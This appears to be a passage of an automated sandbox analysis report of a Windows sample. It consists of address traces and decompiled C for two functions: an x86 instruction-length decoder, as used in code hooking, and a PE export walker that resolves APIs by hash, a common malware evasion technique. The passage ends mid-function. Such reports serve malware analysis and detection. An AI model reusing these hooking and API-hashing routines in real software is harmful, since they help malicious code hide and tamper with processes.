0x708c8810
0x708c8810
0x708c8815
0x708c881a
0x708c881c
0x708c8820
0x708c8827
0x708c882c
0x708c882e
0x708c8b8f
0x708c8b9e
0x708c8bb7
0x708c8bbc
0x708c8bbc
0x708c8841
0x708c8846
0x708c884a
0x708c884a
0x708c884a
0x708c885c
0x708c887d
0x708c8885
0x708c8893
0x708c88b1
0x708c88b7
0x708c88b7
0x708c87c8
0x708c8798
0x708c88c4
0x708c88c6
0x708c88ca
0x708c88d3
0x708c88de
0x708c88e2
0x708c88eb
0x708c88f0
0x708c88f6
0x708c88f7
0x708c88fb
0x708c88ff
0x708c8906
0x708c8908
0x708c8a48
0x708c8a59
0x708c8a60
0x708c8a67
0x708c8a67
0x708c8a6a
0x708c8a6d
0x708c8a70
0x708c8a76
0x00000000
0x708c8a78
0x708c8a78
0x708c8a7b
0x708c8a94
0x708c8aac
0x708c8aaf
0x708c8ab4
0x708c8abe
0x708c8ac1
0x708c8ac4
0x708c8acd
0x00000000
0x00000000
0x00000000
0x708c8a7b
0x00000000
0x708c890e
0x708c8910
0x708c8910
0x708c8912
0x708c8916
0x708c891b
0x708c891d
0x708c8921
0x708c8924
0x708c892c
0x708c892e
0x00000000
0x00000000
0x708c8945
0x708c8960
0x708c8962
0x708c8970
0x708c8975
0x708c8977
0x708c8994
0x708c8998
0x708c899a
0x00000000
0x708c899c
0x708c899c
0x708c899f
0x708c89c0
0x708c89df
0x708c89e5
0x708c89e8
0x708c89ed
0x708c89ee
0x708c89f5
0x00000000
0x708c89fb
0x708c89fd
0x708c89fd
0x708c89ff
0x708c8a0b
0x708c8a17
0x708c8a39
0x708c8a3e
0x708c8a3f
0x708c8a3f
0x00000000
0x708c89ff
0x00000000
0x00000000
0x00000000
0x708c899f
0x708c8979
0x708c8979
0x708c897f
0x708c8981
0x708c8982
0x708c8983
0x708c8984
0x708c8988
0x708c898c
0x708c898e
0x708c898f
0x708c898f
0x00000000
0x708c8977
0x708c89a5
0x708c8a7d
0x708c8a81
0x708c8a8a
0x00000000
0x708c8a8a
0x00000000
0x708c8908

Strings

, xrefs: 708C8AD6

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4153d0f3c58a5b3baef0bd4166027248aa1672a9a499091add95b261848e7cec
Instruction ID: ead2cb2540004dcdfe239132812e46dd7bdcf7c0eac397727e187a38f46c18aa
Opcode Fuzzy Hash: 4153d0f3c58a5b3baef0bd4166027248aa1672a9a499091add95b261848e7cec
Instruction Fuzzy Hash: 7B125E712042449FD715DF28C992B6FB7F6EF95200F1089ADF6AA972A1DB30ED04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 708D92DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E708D92DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E708D35D4( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x708d92e3
0x708d92e7
0x708d92f3
0x708d92f7
0x708d92fb
0x708d9300
0x708d9303
0x708d9305
0x708d9307
0x708d9307
0x708d930a
0x708d9310
0x708d9388
0x708d938c
0x708d938f
0x708d938f
0x708d9392
0x00000000
0x708d9392
0x708d9317
0x708d937f
0x708d9383
0x00000000
0x708d9383
0x708d931e
0x708d9377
0x708d937a
0x00000000
0x708d937a
0x708d9323
0x708d9361
0x708d9368
0x708d936b
0x708d9334
0x708d9334
0x708d933a
0x00000000
0x00000000
0x708d933f
0x708d9359
0x708d935c
0x00000000
0x708d935c
0x708d9344
0x00000000
0x708d9346
0x708d934a
0x708d934d
0x00000000
0x708d934d
0x708d9344
0x708d9395
0x708d9395
0x708d9395
0x708d939e
0x708d93a7
0x708d93aa
0x708d93ad
0x708d93b0
0x708d93b3
0x708d93b9
0x708d93fb
0x708d93fe
0x708d93ff
0x708d9406
0x708d9409
0x708d93bb
0x708d93bf
0x708d93c9
0x708d93d0
0x708d93d2
0x708d93eb
0x708d93ee
0x708d93ee
0x708d93d0
0x708d9411
0x708d9414
0x708d9417
0x708d941b
0x708d941f
0x708d9429
0x708d942d
0x708d9437
0x708d9440
0x708d944d
0x708d9450
0x708d9453
0x708d9453
0x708d945f
0x708d946a
0x708d9470
0x708d9474
0x708d9461
0x708d9461
0x708d9461
0x708d947c
0x708d94a6
0x708d94ac
0x708d94ac
0x708d94b4
0x708d985d
0x708d9863
0x708d9869
0x708d9869
0x00000000
0x708d94ba
0x708d94ba
0x708d94be
0x708d94c1
0x708d94c4
0x708d94c7
0x708d94cb
0x708d94cd
0x708d94d0
0x708d94d3
0x708d94d7
0x708d94dc
0x708d94df
0x708d94e3
0x708d94e8
0x708d94eb
0x708d94ed
0x708d94f0
0x708d94f4
0x708d94f9
0x708d9509
0x708d950f
0x708d950f
0x708d9517
0x708d9519
0x708d9522
0x708d9524
0x708d9527
0x708d9532
0x708d955f
0x708d9534
0x708d954b
0x708d954b
0x708d9567
0x708d956d
0x708d9573
0x708d9573
0x708d9567
0x708d9522
0x708d957a
0x708d95eb
0x708d95f0
0x708d9649
0x708d970b
0x708d9710
0x708d971f
0x708d9725
0x708d9729
0x708d9732
0x708d9739
0x708d9742
0x708d9750
0x708d9753
0x708d973b
0x708d973b
0x708d973b
0x708d9739
0x708d975c
0x708d9789
0x708d979c
0x708d97a4
0x708d978b
0x708d978d
0x708d9795
0x708d9795
0x708d975e
0x708d9763
0x708d9782
0x708d9765
0x708d976a
0x708d977b
0x708d976c
0x708d976c
0x708d976c
0x708d976a
0x708d9763
0x708d97ac
0x708d97bb
0x708d97c8
0x708d97d1
0x708d97d5
0x708d97d9
0x708d97dc
0x708d97df
0x708d97e2
0x708d97e5
0x708d97e8
0x708d97ee
0x708d97f2
0x708d97f8
0x708d97f8
0x708d97ee
0x708d97fe
0x708d983b
0x708d983f
0x708d9846
0x708d984c
0x708d9800
0x708d9803
0x708d9823
0x708d9827
0x708d982e
0x708d9835
0x708d9805
0x708d9808
0x708d980a
0x708d980e
0x708d9818
0x708d981e
0x708d981e
0x708d9808
0x708d9803
0x708d9853
0x708d9853
0x708d986c
0x708d986c
0x708d9872
0x708d9877
0x708d98d1
0x708d98d6
0x708d9915
0x708d991a
0x708d991c
0x708d9920
0x708d9923
0x708d9926
0x708d9928
0x708d9929
0x708d9929
0x708d992e
0x708d994c
0x708d994e
0x708d9952
0x708d9958
0x708d995b
0x708d995d
0x708d995e
0x708d995e
0x00000000
0x708d9930
0x708d9930
0x708d9930
0x708d9934
0x708d993a
0x708d993d
0x708d993f
0x708d9942
0x708d9961
0x708d9961
0x708d9968
0x708d9982
0x708d996a
0x708d996a
0x708d9976
0x708d9977
0x708d997a
0x708d997a
0x708d9990
0x708d9990
0x708d992e
0x708d98db
0x708d98e9
0x708d9901
0x708d9905
0x708d9908
0x708d990e
0x708d9912
0x708d9912
0x00000000
0x708d9912
0x708d98eb
0x708d98ef
0x708d98f5
0x708d98f5
0x708d98fb
0x00000000
0x708d98fb
0x708d98dd
0x708d98e1
0x00000000
0x708d98e1
0x708d987b
0x708d98a7
0x708d98bf
0x708d98c3
0x708d98c6
0x708d98c9
0x708d98cb
0x708d98ce
0x708d98a9
0x708d98a9
0x708d98ad
0x708d98b0
0x708d98b3
0x708d98b6
0x708d98b9
0x708d98b9
0x00000000
0x708d98a7
0x708d9881
0x00000000
0x00000000
0x708d9887
0x708d988b
0x708d9891
0x708d9894
0x708d9897
0x708d989a
0x00000000
0x708d989a
0x708d9712
0x708d9716
0x708d971c
0x00000000
0x708d971c
0x708d9654
0x708d9666
0x708d966b
0x708d96d6
0x00000000
0x00000000
0x708d96dd
0x708d9703
0x708d9707
0x00000000
0x00000000
0x708d96e6
0x708d96eb
0x708d96ff
0x00000000
0x00000000
0x00000000
0x708d9701
0x708d96f2
0x00000000
0x00000000
0x708d96f7
0x00000000
0x00000000
0x708d96f9
0x00000000
0x708d96dd
0x708d966d
0x708d9677
0x708d9688
0x708d968b
0x708d968e
0x708d9694
0x00000000
0x00000000
0x00000000
0x00000000
0x708d969a
0x708d969a
0x708d969a
0x708d96a1
0x00000000
0x00000000
0x708d96a3
0x708d96a6
0x708d96ac
0x00000000
0x00000000
0x00000000
0x708d96ae
0x708d96b0
0x708d96b9
0x00000000
0x00000000
0x708d96cd
0x00000000
0x00000000
0x00000000
0x708d96cf
0x708d965b
0x00000000
0x00000000
0x00000000
0x708d9661
0x708d95f5
0x708d9624
0x708d9625
0x708d962e
0x00000000
0x708d963f
0x00000000
0x708d963f
0x708d95fc
0x708d95ff
0x708d9612
0x708d9613
0x708d9617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x708d95ff
0x708d95f5
0x708d9581
0x708d95de
0x708d95e2
0x708d95e8
0x00000000
0x708d95e8
0x708d9583
0x708d9587
0x708d9594
0x708d9598
0x708d95ae
0x708d95b6
0x708d959a
0x708d959c
0x708d95a6
0x708d95a6
0x708d95bc
0x708d95c5
0x708d95dc
0x00000000
0x00000000
0x00000000
0x708d95dc
0x708d95c7
0x708d95c7
0x00000000
0x708d95bc

Strings

, xrefs: 708D9947

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction ID: afc2238e0c2880f629a315b576b849411af9fc782600c06aa0aba984426440c5
Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction Fuzzy Hash: 5622AB304083898BD71ACE15C49236EBBF6FF89300F108A6EE9DA5B395D3359D45DB92

Uniqueness

Uniqueness Score: -1.00%

Function 708D14D8, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E708D14D8(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E708D03A0(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x708dd208 == 0 ||  *0x708dd2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x212ae3b8;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E708D4BE0( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x708dd2ec |  *0x708dd2ed;
									if(( *0x708dd2ec |  *0x708dd2ed) == 0) {
										_t525 =  *0x708dd208; // 0x4ce1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x708dd2ec = 1;
											_t526 = E708D3558(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E708D1CCC(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x708dd208 = _t526;
											 *0x708dd2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E708D3558(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E708D1CCC(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E708CE070(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E708CE070(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0xd926c223;
									if(_t535[0x54] == 0xd926c223) {
										 *0x708dd20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x80febacc;
										if(_t535[0x54] == 0x80febacc) {
											 *0x708dd210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E708CE94C( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
